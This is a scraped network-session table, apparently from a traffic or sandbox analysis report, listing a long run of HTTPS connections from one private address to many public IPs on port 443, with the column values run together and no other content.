                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16864192.168.2.1435466197.33.193.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16865192.168.2.143849893.150.150.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16866192.168.2.1444008105.2.114.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16867192.168.2.1438156136.215.190.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16868192.168.2.1450136139.35.101.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16869192.168.2.1458054205.124.202.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16870192.168.2.145449488.168.223.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16871192.168.2.1447210207.208.248.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16872192.168.2.145488091.168.22.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16873192.168.2.145742486.167.163.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16874192.168.2.144785686.49.43.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16875192.168.2.145751639.73.83.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16876192.168.2.143842666.138.0.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16877192.168.2.1455970207.144.48.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16878192.168.2.144754060.139.121.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16879192.168.2.143332624.148.221.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16880192.168.2.145380689.217.70.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16881192.168.2.1441306122.236.247.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16882192.168.2.1439912166.30.129.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16883192.168.2.1435192174.137.65.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16884192.168.2.1459474191.62.201.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16885192.168.2.1454546162.14.141.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16886192.168.2.1437718216.27.105.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16887192.168.2.145093036.155.186.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16888192.168.2.1436096141.43.6.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16889192.168.2.1450802196.243.107.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16890192.168.2.144644486.42.222.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16891192.168.2.1455450194.230.172.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16892192.168.2.143734293.91.201.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16893192.168.2.143868651.24.43.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16894192.168.2.143316266.184.161.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16895192.168.2.144773224.12.161.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16896192.168.2.1460044165.82.133.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16897192.168.2.1439850137.94.181.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16898192.168.2.144710024.65.23.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16899192.168.2.145752667.172.218.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16900192.168.2.1447066143.192.77.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16901192.168.2.1455224182.174.245.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16902192.168.2.144465231.137.50.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16903192.168.2.1460558102.253.170.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16904192.168.2.1437074164.135.7.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16905192.168.2.144186632.227.190.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16906192.168.2.1444510221.110.198.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16907192.168.2.1459920204.89.151.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16908192.168.2.1456856185.113.64.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16909192.168.2.1447114196.70.19.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16910192.168.2.1439334108.191.156.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16911192.168.2.1433536172.50.230.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16912192.168.2.1447160208.101.241.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16913192.168.2.1440648196.199.69.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16914192.168.2.146059014.187.18.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16915192.168.2.145911027.190.152.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16916192.168.2.1450610116.190.249.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16917192.168.2.14582102.195.159.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16918192.168.2.1458628189.205.98.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16919192.168.2.143311434.250.17.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16920192.168.2.1448902122.10.250.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16921192.168.2.1438724125.18.163.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16922192.168.2.1457880128.114.185.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16923192.168.2.1439478139.222.124.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16924192.168.2.1443156141.245.71.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16925192.168.2.1455934143.0.207.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16926192.168.2.1433894171.129.67.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16927192.168.2.1436786189.190.205.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16928192.168.2.1452642193.0.128.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16929192.168.2.1459212105.13.178.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16930192.168.2.145229432.39.102.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16931192.168.2.144988437.168.136.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16932192.168.2.1437756188.25.222.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16933192.168.2.1449706159.158.50.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16934192.168.2.1450064173.8.146.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16935192.168.2.1452964207.110.219.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16936192.168.2.143878623.223.28.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16937192.168.2.145531888.136.139.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16938192.168.2.1438826148.197.3.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16939192.168.2.1442642168.252.62.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16940192.168.2.1456358165.110.202.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16941192.168.2.1444372202.124.254.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16942192.168.2.143976632.206.207.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16943192.168.2.144304680.200.97.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16944192.168.2.1459998125.207.158.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16945192.168.2.145579248.246.154.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16946192.168.2.14373602.192.206.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16947192.168.2.1455122200.187.249.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16948192.168.2.1442506169.190.229.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16949192.168.2.1453626192.131.56.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16950192.168.2.14479442.172.90.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16951192.168.2.1447646125.220.239.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16952192.168.2.145676877.152.5.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16953192.168.2.14524681.208.146.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16954192.168.2.1438526179.254.37.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16955192.168.2.1445944213.171.222.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16956192.168.2.1439002195.50.79.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16957192.168.2.1454610181.31.175.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16958192.168.2.1444382179.214.240.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16959192.168.2.144282046.155.25.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16960192.168.2.144583039.223.204.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16961192.168.2.145620296.202.188.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16962192.168.2.1452988195.11.15.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16963192.168.2.1437004200.223.203.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16964192.168.2.1455826143.5.211.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16965192.168.2.1451302216.69.66.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16966192.168.2.1439224154.243.12.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16967192.168.2.1451800107.54.250.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16968192.168.2.1448222120.74.155.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16969192.168.2.145398492.136.195.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16970192.168.2.1448480154.20.175.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16971192.168.2.144164057.247.180.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16972192.168.2.144901251.109.37.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16973192.168.2.143980663.219.9.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16974192.168.2.143959419.192.146.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16975192.168.2.1436930220.175.104.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16976192.168.2.1459004205.152.87.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16977192.168.2.144539858.203.73.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16978192.168.2.14341209.162.134.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16979192.168.2.1460044176.209.94.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16980192.168.2.1451286213.46.68.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16981192.168.2.1449256120.236.231.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16982192.168.2.1435762136.251.251.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16983192.168.2.1434576139.101.245.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16984192.168.2.145005860.52.246.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16985192.168.2.143330049.241.163.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16986192.168.2.1458482199.201.5.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16987192.168.2.144622896.213.144.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16988192.168.2.1459332124.57.193.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16989192.168.2.143772842.203.30.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16990192.168.2.1440330199.57.185.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16991192.168.2.1439074120.142.32.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16992192.168.2.1460872193.60.80.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16993192.168.2.145084843.196.131.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16994192.168.2.1445968152.51.64.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16995192.168.2.1445490207.165.128.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16996192.168.2.1447572157.254.172.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16997192.168.2.1438920145.22.2.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16998192.168.2.1435132122.191.226.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16999192.168.2.1460742191.108.76.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17000192.168.2.1451898152.91.149.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17001192.168.2.14329725.153.177.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17002192.168.2.144885899.127.177.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17003192.168.2.1448218160.162.38.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17004192.168.2.145654624.23.216.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17005192.168.2.143709620.120.42.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17006192.168.2.1455790154.234.184.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17007192.168.2.145091845.69.123.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17008192.168.2.1434722163.156.206.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17009192.168.2.145962294.144.173.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17010192.168.2.145738489.205.8.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17011192.168.2.1449306178.100.115.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17012192.168.2.1454680174.66.81.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17013192.168.2.1435136219.25.28.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17014192.168.2.1451482163.227.18.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17015192.168.2.145889285.182.162.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17016192.168.2.1446282169.228.183.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17017192.168.2.1454070120.53.22.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17018192.168.2.1443450177.186.225.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17019192.168.2.1459142178.131.113.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17020192.168.2.1433470136.209.98.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17021192.168.2.143296470.108.34.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17022192.168.2.145434464.47.245.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17023192.168.2.1439514175.196.222.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17024192.168.2.145453249.59.84.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17025192.168.2.145393096.52.69.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17026192.168.2.14438508.188.81.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17027192.168.2.1453736154.139.58.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17028192.168.2.1458782139.146.244.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17029192.168.2.145325027.143.220.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17030192.168.2.1455230143.156.28.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17031192.168.2.143560438.61.34.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17032192.168.2.14525828.199.17.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17033192.168.2.144500082.234.186.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17034192.168.2.144225894.247.112.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17035192.168.2.144847820.214.239.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17036192.168.2.144423220.108.232.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17037192.168.2.1442214175.147.188.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17038192.168.2.1436188122.120.93.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17039192.168.2.1446510108.189.98.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17040192.168.2.143812813.33.50.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17041192.168.2.1443332139.198.103.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17042192.168.2.143303685.122.128.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17043192.168.2.145955647.51.63.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17044192.168.2.144956485.185.234.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17045192.168.2.1450534170.252.242.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17046192.168.2.146010880.50.151.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17047192.168.2.1458148126.138.229.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17048192.168.2.1445742158.28.236.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17049192.168.2.143628653.170.240.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17050192.168.2.146043625.9.239.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17051192.168.2.1444498202.176.56.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17052192.168.2.145110613.191.175.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17053192.168.2.1442362105.107.194.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17054192.168.2.1447296107.28.253.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17055192.168.2.143770218.243.183.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17056192.168.2.145569474.87.37.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17057192.168.2.1443106130.64.111.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17058192.168.2.1460100135.13.210.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17059192.168.2.144122086.4.3.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17060192.168.2.145100057.124.75.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17061192.168.2.1435118120.236.223.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17062192.168.2.144446475.9.197.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17063192.168.2.1440938104.235.27.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17064192.168.2.1453832155.181.170.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17065192.168.2.14603904.137.30.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17066192.168.2.1447298167.24.38.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17067192.168.2.1433450170.28.114.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17068192.168.2.1447040218.182.147.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17069192.168.2.1460048167.148.31.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17070192.168.2.144333051.118.191.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17071192.168.2.1440186210.194.78.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17072192.168.2.1437804158.177.104.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17073192.168.2.145689634.197.218.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17074192.168.2.1442206119.96.226.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17075192.168.2.145092681.50.11.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17076192.168.2.1449352134.238.81.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17077192.168.2.143278675.208.136.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17078192.168.2.1441620104.206.126.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17079192.168.2.1437258103.125.33.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17080192.168.2.143339634.112.184.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17081192.168.2.1450920171.68.90.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17082192.168.2.1435996137.29.238.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17083192.168.2.144936050.161.106.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17084192.168.2.14456644.153.133.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
